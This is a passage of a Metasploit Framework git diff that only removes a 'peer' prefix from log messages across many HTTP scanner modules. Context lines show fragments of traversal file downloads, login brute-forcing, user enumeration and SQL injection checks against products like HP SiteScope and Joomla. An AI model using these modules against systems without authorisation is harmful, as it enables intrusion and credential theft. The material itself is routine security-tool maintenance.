print_error("\t2. No permission.") print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 8acee32259..a121331058 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -90,11 +90,11 @@ class Metasploit3 < Msf::Auxiliary # sid, token = get_sid_token if sid.nil? or token.nil? - vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue") + vprint_error("Unable to obtain session ID or token, cannot continue") return :abort else - vprint_status("#{peer} - Using sessiond ID: #{sid}") - vprint_status("#{peer} - Using token: #{token}") + vprint_status("Using sessiond ID: #{sid}") + vprint_status("Using token: #{token}") end begin @@ -114,22 +114,22 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return :abort end location = res.headers['Location'] if res and res.headers and (location = res.headers['Location']) and location =~ /admin\// - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.headers['Location']) return :next_user else - vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"") + vprint_error("Bad login: \"#{user}:#{pass}\"") return end end @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 56412ba3f2..04d650de51 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if res.body.include?('Access denied') # This probably means the Views Module actually isn't installed - print_error("#{peer} - Access denied") + print_error("Access denied") return Exploit::CheckCode::Safe elsif res.message != 'OK' || res.body != '[ ]' return Exploit::CheckCode::Safe @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary results << user_list.flatten.uniq end else - print_error("#{peer} - Unexpected results from server") + print_error("Unexpected results from server") return end end diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index a521f753cf..58be3c1b0c 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << payload.gsub('/', '%2f') travs << file.gsub('/', '%2f') - vprint_status("#{peer} - Retrieving file contents...") + vprint_status("Retrieving file contents...") res = send_request_raw( 'method' => 'GET', @@ -89,10 +89,10 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Checking if it's a vulnerable ElasticSearch") + vprint_status("Checking if it's a vulnerable ElasticSearch") check_code = check_host(ip) - print_status("#{peer} - #{check_code.second}") + print_status("#{check_code.second}") if check_host(ip) != Exploit::CheckCode::Appears return end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary contents = read_file(filename) unless contents - print_error("#{peer} - No file downloaded") + print_error("No file downloaded") return end @@ -123,6 +123,6 @@ class Metasploit3 < Msf::Auxiliary fcontent, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index 9da9bffde7..eccfdbc20d 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -53,15 +53,15 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") + vprint_good("Running EtherPAD Duo application ...") return true else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + vprint_error("Application is not EtherPAD Duo. Module will not continue.") return false end end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( @@ -108,16 +108,16 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user, pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 402c7dbdde..3bb9ab7c3b 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -42,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT']) return true if res rescue ::Rex::ConnectionRefused - vprint_status("#{peer} - Connection refused") + vprint_status("Connection refused") return false rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return false rescue ::OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL/TLS connection error") + vprint_error("SSL/TLS connection error") return false end end @@ -61,19 +61,19 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIP management interface if res.body =~ /<title>BIG\-IP/ - print_good("#{peer} - F5 BigIP web management interface found") + print_good("F5 BigIP web management interface found") return end # Detect EM management interface if res.body =~ /<title>Enterprise Manager/ - print_good("#{peer} - F5 Enterprise Manager web management interface found") + print_good("F5 Enterprise Manager web management interface found") return end # Detect ARX management interface if res.body =~ /<title>F5 ARX Manager Login<\/title>/ - print_good("#{peer} - ARX web management interface found") + print_good("ARX web management interface found") return end end @@ -81,14 +81,14 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIQ management interface res = send_request_raw('method' => 'GET', 'uri' => '/ui/login/') if res && res.code == 200 && res.body =~ /<title>BIG\-IQ/ - print_good("#{peer} - F5 BigIQ web management interface found") + print_good("F5 BigIQ web management interface found") return end # Detect FirePass management interface res = send_request_raw('method' => 'GET', 'uri' => '/admin/', 'rport' => rport) if res && res.code == 200 && res.body =~ /<br><br><br><big><b> FirePass/ - print_good("#{peer} - F5 FirePass web management interface found") + print_good("F5 FirePass web management interface found") return end end diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 6217518937..46df091403 100644 --- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -47,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary ) if res && res.body && res.body.include?('user[email]') - vprint_status("#{peer} - GitLab v5 login page") + vprint_status("GitLab v5 login page") elsif res && res.body && res.body.include?('user[login]') - vprint_status("#{peer} - GitLab v7 login page") + vprint_status("GitLab v7 login page") else vprint_error('Not a valid GitLab login page') return diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index 0dd40c9e34..2fa77e2376 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index ec3c90c5c6..c4dbf3e12f 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_imc_som? - vprint_error("#{peer} - HP iMC with the SOM component not found") + vprint_error("HP iMC with the SOM component not found") return end - vprint_status("#{peer} - Sending request...") + vprint_status("Sending request...") res = send_request_cgi({ 'uri' => normalize_uri("servicedesk", "servicedesk", "fileDownload"), 'method' => 'GET', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary contents, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Failed to retrieve file") + vprint_error("Failed to retrieve file") return end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index fa4557f956..39ff1efbeb 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -50,14 +50,14 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") res = send_request_cgi({ 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -65,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary end def accessfile - print_status("#{peer} - Retrieving the target hostname") + print_status("Retrieving the target hostname") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -107,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary end if not host_name or host_name.empty? - print_error("#{peer} - Failed to retrieve the host name") + print_error("Failed to retrieve the host name") return end - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -152,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -160,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -168,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index e60872481f..028e951d5c 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -60,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -84,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" - print_status("#{peer} - Retrieving the SiteScope Configuration") + print_status("Retrieving the SiteScope Configuration") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -103,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -111,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -119,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") - print_status("#{peer} - HP SiteScope Configuration saved in #{path}") - print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data") + print_status("HP SiteScope Configuration saved in #{path}") + print_status("HP SiteScope Configuration is saved as Java serialization data") return end - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index db77012186..5d060660b9 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -50,7 +50,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -59,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" + "\r\n" - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -104,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m loot = CGI.unescapeHTML($1) if not loot or loot.empty? - print_status("#{peer} - Retrieved empty file") + print_status("Retrieved empty file") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") end end diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index 4862e49216..20cceac73b 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb @@ -173,15 +173,15 @@ class Metasploit3 < Msf::Auxiliary version = get_version(res) unless version.blank? - print_status("#{peer} - Version detected: #{version}") + print_status("Version detected: #{version}") unless is_version_tested?(version) - print_warning("#{peer} - You're running the module against a version we have not tested") + print_warning("You're running the module against a version we have not tested") end end sys_name = get_system_name(res) unless sys_name.blank? - print_status("#{peer} - System name detected: #{sys_name}") + print_status("System name detected: #{sys_name}") report_note( :host => ip, :type => "system.name", @@ -190,7 +190,7 @@ class Metasploit3 < Msf::Auxiliary end if anonymous_access?(res) - print_good("#{peer} - No login necessary. Server allows anonymous access.") + print_good("No login necessary. Server allows anonymous access.") return end diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index 4e13b6ad46..a4b17dcea8 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -41,29 +41,29 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) rescue ::Errno::EPIPE, ::Timeout::Error, ::EOFError, ::IOError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end unless res - print_error("#{peer} - Server did not respond in an expected way.") + print_error("Server did not respond in an expected way.") return end if res.code == 401 && res.body =~ /Invalid username\/password/ - print_error("#{peer} - Failed to authenticate. Invalid username/password.") + print_error("Failed to authenticate. Invalid username/password.") return elsif res.code == 200 && res.headers.include?('X-Influxdb-Version') && res.body.length > 0 - print_status("#{peer} - Enumerating...") + print_status("Enumerating...") begin temp = JSON.parse(res.body) if temp.blank? - print_status("#{peer} - Json data is empty") + print_status("Json data is empty") return end results = JSON.pretty_generate(temp) rescue JSON::ParserError - print_error("#{peer} - Unable to parse JSON data.") + print_error("Unable to parse JSON data.") return end print_good("Found:\n\n#{results}\n") @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary results, 'InfluxDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 8a5a866338..7bd5df2dad 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -43,17 +43,17 @@ class Metasploit3 < Msf::Auxiliary }) unless res - vprint_error("#{peer} - No response received") + vprint_error("No response received") return end unless res.headers.include?('X-Jenkins') - vprint_error("#{peer} - responded with #{res.code} but does not seem to be Jenkins") + vprint_error("responded with #{res.code} but does not seem to be Jenkins") return end version = res.headers['X-Jenkins'] - print_status("#{peer} - Jenkins Version - #{version}") + print_status("Jenkins Version - #{version}") report_service( :host => rhost, :port => rport, @@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain', }) unless res - vprint_error("#{peer} - Timeout") + vprint_error("Timeout") return end case res.code when 200 - print_good("#{peer} - #{uri_path} does not require authentication (200)") + print_good("#{uri_path} does not require authentication (200)") report_note({ :type => "jenkins_path", :host => rhost, @@ -120,22 +120,22 @@ class Metasploit3 < Msf::Auxiliary ) end when 403 - print_status("#{peer} - #{uri_path} restricted (403)") + print_status("#{uri_path} restricted (403)") when 401 - print_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") + print_status("#{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") when 404 - print_status("#{peer} - #{uri_path} not found (404)") + print_status("#{uri_path} not found (404)") when 301 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") when 302 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") else - print_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}") + print_status("#{uri_path} Don't know how to handle response code #{res.code}") end end def parse_system_info(body) - vprint_status("#{peer} - Getting useful information from systemInfo") + vprint_status("Getting useful information from systemInfo") infos = { "os.name" => nil, "os.version" => nil, diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 811261b7cc..87894f3c57 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb @@ -68,14 +68,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") + print_good("Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 2ae1d62bb8..760418ed0a 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), @@ -85,14 +85,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") + print_good("Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index da0562c0b6..66072a6adb 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary 'htaccess.txt' ] - vprint_status("#{peer} - Checking for interesting pages") + vprint_status("Checking for interesting pages") pages.each do |page| scan_pages(tpath, page, ip) end @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary note = "Registration Page" end - print_good("#{peer} - #{note}: #{tpath}#{page}") + print_good("#{note}: #{tpath}#{page}") report_note( :host => ip, @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index a199aef541..dee21277e9 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary tpath += '/' end - vprint_status("#{peer} - Checking for interesting plugins") + vprint_status("Checking for interesting plugins") res = send_request_cgi({ 'uri' => tpath, 'method' => 'GET' @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary nsize = res.body.size if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") + print_good("Plugin: #{tpath}#{papp} ") report_note( :host => ip, :port => rport, @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary ) if (papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") + print_good("Vulnerability: Potential LFI") report_web_vuln( :host => ip, :port => rport, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'Local File Inclusion' ) elsif (res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") + print_good("Vulnerability: Potential SQL Injection") report_web_vuln( :host => ip, :port => rport, @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'SQL Injection' ) elsif (papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") + print_good("Vulnerability: Potential XSS") report_web_vuln( :host => ip, :port => rport, @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + print_good("Page: #{tpath}index.php?option=com_#{pages}") report_note( :host => ip, :port => datastore['RPORT'], @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) else - vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + vprint_error("Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") end end elsif (res.code == 403) @@ -156,13 +156,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 9748b7f676..3d6acc979a 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -48,17 +48,17 @@ class Metasploit3 < Msf::Auxiliary def get_users users = nil - vprint_status("#{peer} - Reading users from master...") + vprint_status("Reading users from master...") res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'ReadUsersFromMasterServlet')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 404 - vprint_error("#{peer} - Could not find 'ReadUsersFromMasterServlet'") + vprint_error("Could not find 'ReadUsersFromMasterServlet'") elsif res.code == 200 && res.body =~ /<discoverydata>(.+)<\/discoverydata>/ users = res.body.scan(/<discoverydata>(.*?)<\/discoverydata>/) - vprint_good("#{peer} - Found #{users.length} users") + vprint_good("Found #{users.length} users") else - vprint_error("#{peer} - Could not find any users") + vprint_error("Could not find any users") end users end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary ] ) - vprint_status("#{peer} - Parsing user data...") + vprint_status("Parsing user data...") users.each do |user| record = parse_user_data(user.to_s) next if record.join.empty? @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary cred_table << [user, pass, hash, role, mail, salt] if pass - print_status("#{peer} - Found weak credentials (#{user}:#{pass})") + print_status("Found weak credentials (#{user}:#{pass})") credential_data = { origin_type: :service, module_fullname: self.fullname, diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index 8774079b5d..77d6dc7091 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + print_error("Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -80,10 +80,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - 